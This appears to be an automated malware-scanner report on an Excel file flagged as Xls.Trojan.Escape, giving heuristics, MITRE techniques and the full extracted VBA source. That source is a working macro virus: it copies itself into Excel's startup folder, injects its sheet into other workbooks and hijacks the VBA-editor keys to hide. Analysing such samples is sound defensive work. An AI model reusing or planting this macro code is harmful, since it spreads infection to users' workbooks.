MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
This Excel document contains VBA macros, including an Auto_Open macro, which is a common technique for malware execution. The macro attempts to copy itself to the Excel startup folder as 'StartUp.xls' and potentially register it for auto-execution, indicating a persistence mechanism. ClamAV detections further confirm its malicious nature.
Heuristics 3
-
ClamAV: Xls.Trojan.Escape-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Escape-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3443 bytes |
SHA-256: 5a2e6e3fb5f8fa1d8972614657922017a409bc633a7e5cac8c87e2d94eed5b30 |
|||
|
Detection
ClamAV:
Xls.Trojan.Escape-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
Dim i As Single
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.Calculation = xlCalculationManual
' On Error Resume Next
' On Error GoTo 0
Worksheets("barcode").ComboBox2.Clear
Worksheets("barcode").ComboBox2.AddItem "MDM20"
Worksheets("barcode").ComboBox2.AddItem "MDQ70"
Worksheets("barcode").ComboBox2.AddItem "MDM21"
Worksheets("barcode").ComboBox2.AddItem "MDM20Z"
Worksheets("barcode").ComboBox2.AddItem "MDT10"
Worksheets("barcode").ComboBox2.AddItem "MDS90"
Worksheets("barcode").ComboBox1.Clear
Worksheets("barcode").ComboBox1.AddItem "新LOT"
' Worksheets("barcode").ComboBox3.Clear
' For i = 2 To Worksheets("sequence").[a65536].End(xlUp).Row
' Worksheets("barcode").ComboBox3.AddItem Worksheets("sequence").Cells(i, 1)
' Next i
Dim MyArray(280, 3)
'第一个列表框包含三个数据列
Worksheets("barcode").ListBox1.ColumnCount = 3
'第二个框包含六个数据列
For i = 0 To 280
MyArray(i, 0) = Worksheets("全工程(ZPT)").Cells(i + 4, 8)
MyArray(i, 1) = Worksheets("全工程(ZPT)").Cells(i + 4, 6)
MyArray(i, 2) = Worksheets("全工程(ZPT)").Cells(i + 4, 7)
Next i
' MyArray = Worksheets("全工程(ZPT)").Range("F4:H" & Worksheets("全工程(ZPT)").[a65536].End(xlUp).Row)
' MyArray = Worksheets("全工程(ZPT)").Range("f4:h9")
Worksheets("barcode").ListBox1.List() = MyArray
' ListBox2.Column() = MyArray
Rem arr = Worksheets("全工程(ZPT)").Range("F4:H" & Worksheets("全工程(ZPT)").[a65536].End(xlUp).Row)
Rem ListBox1.AddItem Worksheets("全工程(ZPT)").Cells(i, 6)
End Sub
Sub ycop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close
End If
Next
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!ycop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.